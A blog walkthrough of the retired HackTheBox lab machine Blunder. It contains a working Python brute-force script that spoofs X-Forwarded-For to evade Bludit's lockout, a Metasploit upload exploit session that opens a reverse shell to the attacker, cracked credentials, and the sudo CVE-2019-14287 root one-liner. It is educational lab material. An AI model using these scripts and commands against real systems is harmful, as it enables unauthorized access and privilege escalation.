Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HackTheBox - Blunder
|htbmachinesretired|

Summary

Blunder, a Linux box created by HackTheBox user egotisticalSW is an easy rated box.The Initial foothold was finding a username is todo.txt and brute-forcing the password with the wordlist created from the blog posts.Using metasploit we can get a shell as www-data and then finding a user.php which contain a password hash for user. Cracking the hash an using su we can get the user. Checking sudo -l we see we can run /bin/bash as different user and not root, and the version of sudo was Sudo version 1.8.25p1 which have a CVE using which we can get root.

Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
# Nmap 7.80 scan initiated Sun May 31 01:00:46 2020 as: nmap -sC -sV -T4 -oN nmap/scan 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 31 01:02:06 2020 -- 1 IP address (1 host up) scanned in 79.95 seconds

web

also found an admin page

little but of googling shows it is running bludit

Checking About page

1
I created this site to dump my fact files, nothing more.......?

gobuster also reveal

1
gobuster dir  -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -u http://10.10.10.191/  -x txt  -o root-txt.gobust
1
2
3
4
5
6
7
8
9
10
11
12
13
/.php (Status: 403)
/.html (Status: 403)
/.html.txt (Status: 403)
/admin (Status: 301)
/.htm (Status: 403)
/.htm.txt (Status: 403)
/LICENSE (Status: 200)
/about (Status: 200)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/0 (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)

an todo.txt and checking that we see

which give us a possible username as fergus

trying to brute-force the password we get IP blocked on the bludit. So I googled

and googling around we find article

using that i tried with rockyou.txt running for sometime i still didn’t got the password. As a last effort i tried

1
cewl http://10.10.10.191 > custom
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus' # or admin?
cnt=0
filepath='./small-list'
with open(filepath) as fp:
   password = fp.readline().strip()
   cnt = cnt + 1
   while True:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {c} {p}'.format(p = password,c = cnt))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
    password = fp.readline().strip()
    cnt = cnt + 1
1
2
3
4
5
6
7
python3 brute.py
...
[*] Trying: 175 Contribution
[*] Trying: 176 RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

and using that script we get the credentials as

1
fergus:RolandDeschain

searchsploit on bludit shows two exploits

1
2
3
4
5
6
7
8
searchsploit bludit
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Bludit - Directory Traversal Image File Upload (Metasploit)                                                                                                                                              | php/remote/47699.rb
bludit Pages Editor 3.0.0 - Arbitrary File Upload                                                                                                                                                        | php/webapps/46060.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

and checking the web

we find the version as 3.9.2

and we can get a shell using metasploit
as

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ msfconsole
msf5  use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS 10.10.10.191
RHOSTS => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.133:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading eEmaECuGvt.png...
[*] Uploading .htaccess...
[*] Executing eEmaECuGvt.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.133:4444 -> 10.10.10.191:42114) at 2020-05-31 02:27:37 +0530
[+] Deleted .htaccess

meterpreter > shell

we get a shell as www-data

User

After getting the shell as www-data we enumerate the box we find two version bludit

1
2
3
4
5
6
7
8
www-data@blunder:/var/www$ ls -la
total 20
drwxr-xr-x  5 root     root     4096 Nov 28  2019 .
drwxr-xr-x 15 root     root     4096 Nov 27  2019 ..
drwxr-xr-x  8 www-data www-data 4096 May 19 15:13 bludit-3.10.0a
drwxrwxr-x  8 www-data www-data 4096 Apr 28 12:18 bludit-3.9.2
drwxr-xr-x  2 root     root     4096 Nov 28  2019 html
www-data@blunder:/var/www$

bludit-3.10.0a and bludit-3.9.2

After getting shell we find a file in /var/www/bludit-3.10.0a/bl-content/databases user.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

which contain a hash and cracking

for user hugo as Password120

Privilege Escalation

Running sudo -l on the box reveal

1
2
3
4
5
6
7
8
hugo@blunder:~$ sudo -l
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:~$

we can run /bin/bash to any user but root

also checking sudo -V shows us that

1
2
3
4
5
6
7
hugo@blunder:~$ sudo -V
sudo -V
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
hugo@blunder:~$

this is a version of sudo which is vulnerable to CVE-2019-14287 about which i had also written here

1
sudo -u#4294967295 /bin/bash
1
2
3
4
5
root@blunder:/root# whoami;hostname;cut -c 1-15 root.txt
root
blunder
127aef843502190
root@blunder:/root#

and we have pwned Blunder 💃

Extra

while doing the box i got in the rabbit hole after getting www-data. I saw /ftp folder and got that folder and was looking in that if that could get us user.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/blunder/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxeasymetasploitbruteforcingsudo-cve